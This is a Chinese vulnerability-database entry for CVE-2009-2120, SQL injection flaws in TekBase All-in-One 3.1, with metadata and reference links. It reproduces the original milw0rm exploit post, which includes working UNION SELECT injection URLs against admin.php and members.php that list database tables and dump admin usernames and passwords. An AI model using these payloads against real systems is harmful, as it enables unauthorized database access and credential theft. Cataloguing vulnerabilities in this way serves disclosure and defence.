TekBase All-in-One 多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117985 漏洞类型 SQL注入
发布时间 2009-06-17 更新时间 2009-06-17
CVE编号 CVE-2009-2120 CNNVD-ID CNNVD-200906-308
漏洞平台 PHP CVSS评分 6.5
|漏洞来源
https://www.exploit-db.com/exploits/8977
https://www.securityfocus.com/bid/43855
https://cxsecurity.com/issue/WLB-2009060152
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-308
|漏洞详情
TekBaseAll-in-One3.1版本中存在多个SQL注入漏洞。远程认证用户可以借助(1)对admin.php的ids参数,(2)对members.php的y参数以及未明向量,执行任意SQL指令。
|漏洞EXP
############################
# Author: n3wb0ss
# Date: 15/06/09
# Contact: n3wboss@Safe-mail.net
############################
# Software: TekBase All-in-One 3.1 
# Vendor: tekbase.de
# Example: http://demo.tekbase.de/
# Vendor contacted: No
# Risk: High
############################
# I found this website on a german board, looking for another script.
# Looks to me, like a Gameserver,TS-Server,Whatever-Server-Managing Script. No matter...
# It's vuln I found a lot more, but I decided to release just two examples to the public.
# U need accessdate, you can get them for demo on tekbase.de (Admin&Customer-Login)
############################
# Here it is (adminaccess needed):
# Unfortunately I can't provide any sourcecode of this shit... it's closed source crap. But I think it should be easy to get it :P
# Have fun!
# POC: 
http://demo.tekbase.de/admin.php?op=adminSupport&zahl=0&torder=&tcounter=15&ids=99991%27/**/unIon/**/Select/**/1,2,3,4,CONCAT(unhex(hex(TABLE_NAME))),6,7,8,9,10,11/**/frOM/**/INFORMATION_SCHEMA.COLUMNS/**/liMIT/**/-1/*

############################
# Second one( just be a member):
# POC:
http://demo.tekbase.de/members.php?op=membersBills&y=-2007%27/**/unION/**/SeleCT/**/1,TABLE_NAME,3,4,5,6,7,8/**/FroM/**/INFORMATION_SCHEMA.TABLES/*
http://demo.tekbase.de/members.php?op=membersBills&y=-2007%27/**/unION/**/SeleCT/**/1,group_concAT(admin,0x3a,password),3,4,5,6,7,8/**/FroM/**/teklab_admin/*

############################
# As said before, just 2 of many vulns
# 
#
# H4ppy Gr33tinGs to the only On3
#
###########################

# milw0rm.com [2009-06-17]
|受影响的产品
TekBase All-in-One 3.1
|参考资料

来源:MILW0RM
名称:8977
链接:http://www.milw0rm.com/exploits/8977
来源:SECUNIA
名称:35481
链接:http://secunia.com/advisories/35481
来源:OSVDB
名称:55191
链接:http://osvdb.org/55191
来源:OSVDB
名称:55190
链接:http://osvdb.org/55190